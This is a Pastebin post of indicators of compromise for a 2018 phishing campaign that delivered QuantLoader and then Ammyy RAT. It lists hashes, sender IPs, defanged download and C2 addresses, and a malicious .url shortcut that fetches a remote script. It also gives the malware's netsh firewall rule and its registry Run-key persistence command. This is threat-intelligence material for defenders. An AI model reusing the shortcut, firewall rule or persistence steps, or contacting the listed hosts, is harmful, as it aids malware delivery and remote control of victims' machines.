Advertisement
pastehaste

2018-03-05 Quantloader -> Ammyy RAT IOCs

Mar 9th, 2018
425
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.84 KB | None | 0 0
  1. SENDER (SPOOFED):
  2. accounts@%domain%.com
  3.  
  4. ORIGINATING IP:
  5. 37.186.140.201
  6. 185.6.113.194
  7.  
  8. SUBJECT(S):
  9. Receipt No 6276610
  10. [] Receipt No 557082096
  11.  
  12. DATE:
  13. Mon, 05 Mar 2018 14:19:05 +0200
  14.  
  15. ATTACHMENT(S):
  16. 109f06034ad1e309829e5758e87b7bde (Receipt 6276610.zip)
  17. 93fb3c6de030ca1518bada43ae15cb0a (Receipt 557082096.zip)
  18.  
  19. ARCHIVE CONTENT:
  20. 181ee5dd2538926fec579b15bd6ed1c9 (I62345074320.url)
  21.  
  22. SHORTCUT CONTENT:
  23. [{000214A0-0000-0000-C000-000000000046}]
  24. Prop3=19,9
  25. [InternetShortcut]
  26. IDList=
  27. URL=file://buyviagraoverthecounterusabb[.]net/documents/I62345074320.js
  28. HotKey=0
  29. IconIndex=3
  30. IconFile=C:\Windows\System32\shell32.dll
  31.  
  32. BUYVIAGRAOVERTHECOUNTERUSABB.NET RESOLUTION:
  33. 91.102.153.90
  34.  
  35. JS DELIVERED:
  36. 6de7f9c587cbc52aa05548396c34f083 (I62345074320.js)
  37.  
  38. HTTP TRAFFIC:
  39. hxxp://intra.cfecgcaquitaine[.]com/kjdhc783
  40. hxxp://wassronledorhad[.]in/q2/index.php?id=
  41. hxxp://wassronledorhad[.]in/q2/index.php?id=
  42. hxxp://balzantruck[.]com/45rt.exe
  43.  
  44. DNS TRAFFIC:
  45. wassronledorhad[.]in (49.51.228.205)
  46. intra.cfecgcaquitaine[.]com (94.247.178.77)
  47. balzantruck[.]com (69.156.240.29)
  48.  
  49. DROPS QUANTLOADER:
  50. 4394536e9a53b94a2634c68043e76ef8 (kjdhc783 / dwm.exe)
  51. f950fbd4755624d5f73b9f5b0b2d568d (kjdhc783 / dwm.exe)
  52.  
  53. MODIFIES WINDOWS FW CONFIG:
  54. netsh advfirewall firewall add rule name="Quant" program="c:\users\user1\appdata\roaming\74212434\dwm.exe" dir=Out action=allow
  55.  
  56. QUANTLOADER DOWNLOADS AMMYY RAT:
  57. hxxp://balzantruck[.]com/45rt.exe
  58. 6c6d772704abf4426c5d7e5a52c847d7 (45rt.exe )
  59.  
  60. PERSISTENCE MECHANISM:
  61. dwm.exe
  62. ->
  63. regini.exe regini C:\Users\user1\AppData\Local\Temp\per
  64.  
  65. PER CONTENT:
  66. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  67.  
  68. QUANTLOADER C2:
  69. hxxp://wassronledorhad[.]in/q2/index.php
  70.  
  71. AMMYY C2:
  72. 179.60.146.3
  73.  
  74. REF:
  75. https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement